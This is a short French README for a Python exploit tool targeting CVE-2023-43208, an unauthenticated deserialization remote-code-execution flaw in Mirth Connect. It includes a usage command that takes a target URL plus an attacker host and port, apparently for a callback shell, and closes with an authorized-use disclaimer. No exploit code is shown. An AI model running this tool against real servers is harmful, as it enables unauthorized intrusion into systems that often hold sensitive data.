
Implémentation Python de CVE-2023-43208 Mirth Connect RCE (XStream non authentifié)
Cet exploit exploite une vulnérabilité critique de désérialisation dans le moteur XStream de Mirth Connect. Il provient d'un correctif incomplet pour CVE-2023-37679, permettant l'exécution de code arbitraire non authentifiée sur toutes les versions antérieures à 4.4.1.
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
Ce script d'exploitation est destiné strictement à des fins éducatives et à des audits de sécurité autorisés afin d'aider les défenseurs à atténuer CVE-2023-43208 ; toute utilisation de cet outil contre des cibles non autorisées est illégale et relève de la seule responsabilité de l'utilisateur final. L'auteur fournit ce logiciel « en l'état » sans aucune garantie, décline toute responsabilité en cas d'utilisation abusive ou de dommages, et n'approuve ni n'encourage les activités non autorisées. Utilisez-le à vos risques et périls et uniquement en conformité avec les lois applicables.